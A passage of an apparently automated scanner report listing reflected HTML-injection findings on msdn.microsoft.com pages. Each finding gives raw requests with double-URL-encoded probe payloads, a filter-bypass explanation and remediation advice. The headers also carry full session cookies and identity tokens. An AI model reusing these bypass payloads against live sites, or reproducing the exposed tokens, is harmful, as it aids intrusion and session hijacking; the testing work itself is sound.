GET /en-us76b5a%2522%253e%253ca%253e034bccb92c5/library(d=loband HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us76b5a"><a>034bccb92c5/library(d=loband" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb1e%2522%253e%253ca%253e76f5534360f was submitted in the REST URL parameter 1. This input was echoed as dfb1e"><a>76f5534360f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usdfb1e%2522%253e%253ca%253e76f5534360f/library/aa155072.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdfb1e"><a>76f5534360f/library/aa155072" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9866b%2522%253e%253ca%253e65c7083c4f8 was submitted in the REST URL parameter 2. This input was echoed as 9866b"><a>65c7083c4f8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9866b%2522%253e%253ca%253e65c7083c4f8/aa155072.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9866b"><a>65c7083c4f8/aa155072" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d906d%2522%253e%253ca%253eab4656b12f7 was submitted in the REST URL parameter 3. This input was echoed as d906d"><a>ab4656b12f7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/aa155072.aspxd906d%2522%253e%253ca%253eab4656b12f7 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa155072.aspxd906d"><a>ab4656b12f7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc85%2522%253e%253ca%253e836b0a1a57e was submitted in the REST URL parameter 1. This input was echoed as fbc85"><a>836b0a1a57e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usfbc85%2522%253e%253ca%253e836b0a1a57e/library/aa155073.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usfbc85"><a>836b0a1a57e/library/aa155073" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc097%2522%253e%253ca%253e0c9278f4fd1 was submitted in the REST URL parameter 2. This input was echoed as fc097"><a>0c9278f4fd1 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryfc097%2522%253e%253ca%253e0c9278f4fd1/aa155073.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfc097"><a>0c9278f4fd1/aa155073" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67843%2522%253e%253ca%253ee5b048815e6 was submitted in the REST URL parameter 3. This input was echoed as 67843"><a>e5b048815e6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/aa155073.aspx67843%2522%253e%253ca%253ee5b048815e6 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 